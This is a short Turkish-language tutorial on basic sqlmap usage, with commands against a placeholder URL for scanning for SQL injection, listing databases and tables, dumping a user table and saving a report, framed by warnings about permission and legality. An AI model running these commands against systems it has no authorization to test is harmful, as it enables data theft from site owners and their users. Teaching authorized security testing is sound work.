Sqlmap, bir web uygulamasının veritabanında güvenlik açıkları aramak için kullanılan açık kaynaklı bir araçtır. SQL enjeksiyonu saldırılarını otomatize etmek için tasarlanmıştır ve potansiyel güvenlik açıklarını tespit etmeye yöneliktir. Ancak, bu tür araçları kullanmak, etik kurallara ve yasalara uygun bir şekilde yapılmalıdır. Web uygulamalarının sahibinden izin almadan ve yasalara aykırı bir şekilde bu tür araçları kullanmak yasa dışıdır.
Sqlmap Temel Kullanımı
-
Temel Tarama:
- Hedef bir web uygulamasını tarayarak SQL enjeksiyonu açıklarını kontrol etmek için:
sqlmap -u "http://hedef-uygulama.com/parametre.php?id=1"
- Hedef bir web uygulamasını tarayarak SQL enjeksiyonu açıklarını kontrol etmek için:
-
Veritabanı Tarama:
- Veritabanı türünü tespit etmek için:
sqlmap -u "http://hedef-uygulama.com/parametre.php?id=1" --dbs
- Veritabanı türünü tespit etmek için:
-
Belirli Bir Veritabanı İçinde Tabloları Listeleme:
- Örneğin, "veritabani_adi" adlı bir veritabanındaki tabloları listelemek için:
sqlmap -u "http://hedef-uygulama.com/parametre.php?id=1" -D veritabani_adi --tables
- Örneğin, "veritabani_adi" adlı bir veritabanındaki tabloları listelemek için:
-
Tablo İçeriğini Gösterme:
- Örneğin, "kullanici" adlı bir tablonun içeriğini göstermek için:
sqlmap -u "http://hedef-uygulama.com/parametre.php?id=1" -D veritabani_adi -T kullanici --dump
- Örneğin, "kullanici" adlı bir tablonun içeriğini göstermek için:
-
Detaylı Rapor Alma:
- Tarama sonuçları için detaylı bir rapor almak için:
sqlmap -u "http://hedef-uygulama.com/parametre.php?id=1" --batch --output-dir=/path/to/output
- Tarama sonuçları için detaylı bir rapor almak için:
Bu örnekler, sqlmap'in temel kullanımına dair bazı komutları göstermektedir. Ancak, bu tür araçları kullanmadan önce, izin alınması ve yasal çerçeveye uyulması önemlidir. Ayrıca, SQL enjeksiyonu testlerini gerçekleştirirken dikkatli olunmalı ve bu tür testlerin etik ve yasal sınırlar içinde yapılması sağlanmalıdır.